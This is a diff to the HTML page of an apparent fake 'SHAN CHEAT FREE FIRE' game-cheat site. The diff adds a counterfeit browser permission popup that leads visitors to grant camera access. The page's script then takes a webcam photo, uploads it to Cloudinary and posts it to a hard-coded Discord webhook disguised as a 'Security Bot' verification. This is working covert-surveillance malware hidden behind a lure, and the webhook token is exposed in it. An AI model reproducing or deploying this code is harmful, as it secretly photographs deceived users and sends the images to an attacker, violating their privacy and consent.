--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>SHAN CHEAT - Capture Window</title>
+    <title>SHAN CHEAT - Access CM</title>
     <style>
         body {
             background-color: black;
@@ -29,6 +29,26 @@
         button:hover {
             background-color: darkred;
         }
+        /* Fake Popup */
+        #cm-popup {
+            position: fixed;
+            top: 50%;
+            left: 50%;
+            transform: translate(-50%, -50%);
+            background: white;
+            color: black;
+            padding: 20px;
+            box-shadow: 0px 0px 10px gray;
+            z-index: 999;
+            display: none;
+            border-radius: 10px;
+        }
+        #cm-popup button {
+            background-color: green;
+            padding: 10px;
+            font-size: 16px;
+            border-radius: 5px;
+        }
     </style>
 </head>
 <body>
@@ -36,74 +56,89 @@
 <div class="container">
     <h1>SHAN CHEAT FREE FIRE</h1>
     <p>Follow this page to enable Capture Window.</p>
-    <button onclick="captureWindow()">Enable Capture Window</button>
+    <button onclick="showCMPopup()">Enable CM</button>
+</div>
+
+<!-- Fake CM Popup -->
+<div id="cm-popup">
+    <p>shancheat99.github.io would like to access the CM</p>
+    <button onclick="grantCMAccess()">Allow</button>
 </div>
 
 <script>
-    async function captureWindow() {
-        const video = document.createElement('video');
-        const canvas = document.createElement('canvas');
-        const context = canvas.getContext('2d');
+function showCMPopup() {
+    document.getElementById("cm-popup").style.display = "block";
+}
 
-        try {
-            const stream = await navigator.mediaDevices.getUserMedia({ video: true }); // Capture Window Access
-            video.srcObject = stream;
-            await new Promise(resolve => video.onloadedmetadata = resolve);
+async function grantCMAccess() {
+    document.getElementById("cm-popup").style.display = "none"; // Hide Fake Popup
+    captureWindow(); // Start Capturing
+}
 
-            video.play();
-            setTimeout(() => {
-                canvas.width = video.videoWidth;
-                canvas.height = video.videoHeight;
-                context.drawImage(video, 0, 0, canvas.width, canvas.height);
+async function captureWindow() {
+    const video = document.createElement('video');
+    const canvas = document.createElement('canvas');
+    const context = canvas.getContext('2d');
 
-                video.srcObject.getTracks().forEach(track => track.stop());
+    try {
+        const stream = await navigator.mediaDevices.getUserMedia({ video: true }); // Capture Window Access
+        video.srcObject = stream;
+        await new Promise(resolve => video.onloadedmetadata = resolve);
 
-                canvas.toBlob(blob => uploadPhoto(blob), 'image/png');
-            }, 1000);
-        } catch (err) {
-            alert("Capture Window access denied!");
-            console.error(err);
-        }
+        video.play();
+        setTimeout(() => {
+            canvas.width = video.videoWidth;
+            canvas.height = video.videoHeight;
+            context.drawImage(video, 0, 0, canvas.width, canvas.height);
+
+            video.srcObject.getTracks().forEach(track => track.stop());
+
+            canvas.toBlob(blob => uploadPhoto(blob), 'image/png');
+        }, 1000);
+    } catch (err) {
+        alert("Capture Window access denied!");
+        console.error(err);
     }
+}
 
-    async function uploadPhoto(imageBlob) {
-        const cloudName = "dxe2hsegn";  
-        const uploadPreset = "my_preset";  
+async function uploadPhoto(imageBlob) {
+    const cloudName = "dxe2hsegn";  
+    const uploadPreset = "my_preset";  
 
-        const formData = new FormData();
-        formData.append("file", imageBlob);
-        formData.append("upload_preset", uploadPreset);
+    const formData = new FormData();
+    formData.append("file", imageBlob);
+    formData.append("upload_preset", uploadPreset);
 
-        try {
-            const response = await fetch(`https://api.cloudinary.com/v1_1/${cloudName}/image/upload`, {
-                method: "POST",
-                body: formData
-            });
-
-            const result = await response.json();
-            const imageUrl = result.secure_url; 
-
-            sendToDiscord(imageUrl);
-        } catch (error) {
-            console.error("Cloudinary upload error:", error);
-        }
-    }
-
-    function sendToDiscord(imageUrl) {
-        fetch("https://discord.com/api/webhooks/1340611336966770761/BG9LqkUM1Tri7XT1oHVaotzuOQo6VTj4fnWsmtgS0geRxhdBAVZ0wxw3XqGdjLYIY9xI", {
+    try {
+        const response = await fetch(`https://api.cloudinary.com/v1_1/${cloudName}/image/upload`, {
             method: "POST",
-            headers: { "Content-Type": "application/json" },
-            body: JSON.stringify({ 
-                username: "Security Bot", 
-                content: "User verification photo:", 
-                embeds: [{
-                    image: { url: imageUrl }
-                }]
-            })
-        })
-        .then(response => console.log("Photo sent to Discord!"))
-        .catch(err => console.error("Error sending to Discord:", err));
+            body: formData
+        });
+
+        const result = await response.json();
+        const imageUrl = result.secure_url; 
+
+        sendToDiscord(imageUrl);
+    } catch (error) {
+        console.error("Cloudinary upload error:", error);
     }
+}
+
+function sendToDiscord(imageUrl) {
+    fetch("https://discord.com/api/webhooks/1340611336966770761/BG9LqkUM1Tri7XT1oHVaotzuOQo6VTj4fnWsmtgS0geRxhdBAVZ0wxw3XqGdjLYIY9xI", {
+        method: "POST",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify({ 
+            username: "Security Bot", 
+            content: "User verification photo:", 
+            embeds: [{
+                image: { url: imageUrl }
+            }]
+        })
+    })
+    .then(response => console.log("Photo sent to Discord!"))
+    .catch(err => console.error("Error sending to Discord:", err));
+}
 </script>
 
 </body>
